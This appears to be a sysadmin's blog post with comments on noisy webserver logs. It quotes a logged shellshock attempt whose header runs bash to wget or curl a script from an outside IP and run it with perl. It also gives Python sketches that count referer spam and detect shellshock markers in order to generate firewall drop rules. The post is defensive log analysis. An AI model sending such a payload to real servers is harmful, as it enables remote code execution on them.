If you run a webserver the chances are high that you'll get hit by random exploit attempts. Today one of my servers logged this - an obvious shellshock exploit attempt:
92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
  "GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
  "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
  curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"
Yesterday I got hit with thousands of these referer-spam attempts:
152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1" \
  200 7425 "http://buttons-for-website.com" \
  "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
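Spotting this sort of flood is mostly a matter of tallying fields. Here's a rough Python sketch - assuming a standard combined-format log, and a made-up path of /var/log/apache2/access.log - which counts hits per referer so the spam domains float straight to the top:

import re
from collections import Counter

LOG = "/var/log/apache2/access.log"   # hypothetical path; adjust for your own vhosts

# In the combined log format the referer is the second-to-last quoted field.
referer_re = re.compile(r'"([^"]*)" "[^"]*"$')

counts = Counter()
with open(LOG, errors="replace") as fh:
    for line in fh:
        match = referer_re.search(line.rstrip())
        if match and match.group(1) not in ("-", ""):
            counts[match.group(1)] += 1

for referer, hits in counts.most_common(20):
    print("%6d  %s" % (hits, referer))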
When it comes to stopping dictionary attacks against SSH servers we have tools like denyhosts and fail2ban (or even non-standard SSH ports).
For Apache/webserver exploits what do we have? mod_security?
I recently heard of apache-scalp, which seems to be a project that analyses webserver logs looking for patterns indicative of attack attempts.
Unfortunately the suggested rules come from the PHP-IDS project and are horribly bad.
I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else thinks the rules are bad - which is what I thought of the PHP-IDS set - I guess it's hard to know.
For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.
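The firewalling part is easy enough to script, at least for the obvious cases. A rough Python sketch - hypothetical log path again, and printing the rules for review rather than applying them blindly - which pulls out the client IPs that sent the tell-tale "() {" shellshock marker:

import re

LOG = "/var/log/apache2/access.log"   # hypothetical path; adjust for your own vhosts

# "() {" at the start of a header value is the give-away shellshock marker;
# here we just look for it anywhere in the logged line.
shellshock = re.compile(r"\(\)\s*\{")

offenders = set()
with open(LOG, errors="replace") as fh:
    for line in fh:
        if shellshock.search(line):
            offenders.add(line.split()[0])   # first field is the client IP

for ip in sorted(offenders):
    print("iptables -I INPUT -s %s -j DROP" % ip)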
Shame.
Tags: apache, security, webservers
I've seen people use fail2ban against webserver logs before - but generally speaking they tend to have very loose rule definitions.
If I were to publish a list of patterns I'd be very specific about what they were compared to - for example "referer", "user-agent", "request", "method", etc.
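Something along these lines is what I have in mind - a rough Python sketch, where the field names, patterns, and the sample line are purely illustrative:

import re

# Each rule names the field it applies to, rather than being grepped across
# the whole log line. The patterns are only illustrative.
RULES = [
    ("user-agent", re.compile(r"\(\)\s*\{"),                "shellshock payload"),
    ("request",    re.compile(r"/cgi-bin/.*\.cgi"),         "CGI probe"),
    ("referer",    re.compile(r"buttons-for-website\.com"), "referer spam"),
]

# Combined log format, split into the named fields we care about.
log_re = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \S+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<useragent>[^"]*)"'
)

def check(line):
    """Return the description of every rule matching this log line."""
    m = log_re.match(line)
    if not m:
        return []
    fields = {
        "request":    m.group("request"),
        "referer":    m.group("referer"),
        "user-agent": m.group("useragent"),
    }
    return [desc for field, pattern, desc in RULES if pattern.search(fields[field])]

line = ('1.2.3.4 - - [02/Dec/2014:11:50:03 +0000] "GET /cgi-bin/dbs.cgi HTTP/1.1" '
        '404 2325 "-" "() { :;}; /bin/bash -c ..."')
print(check(line))    # ['shellshock payload', 'CGI probe']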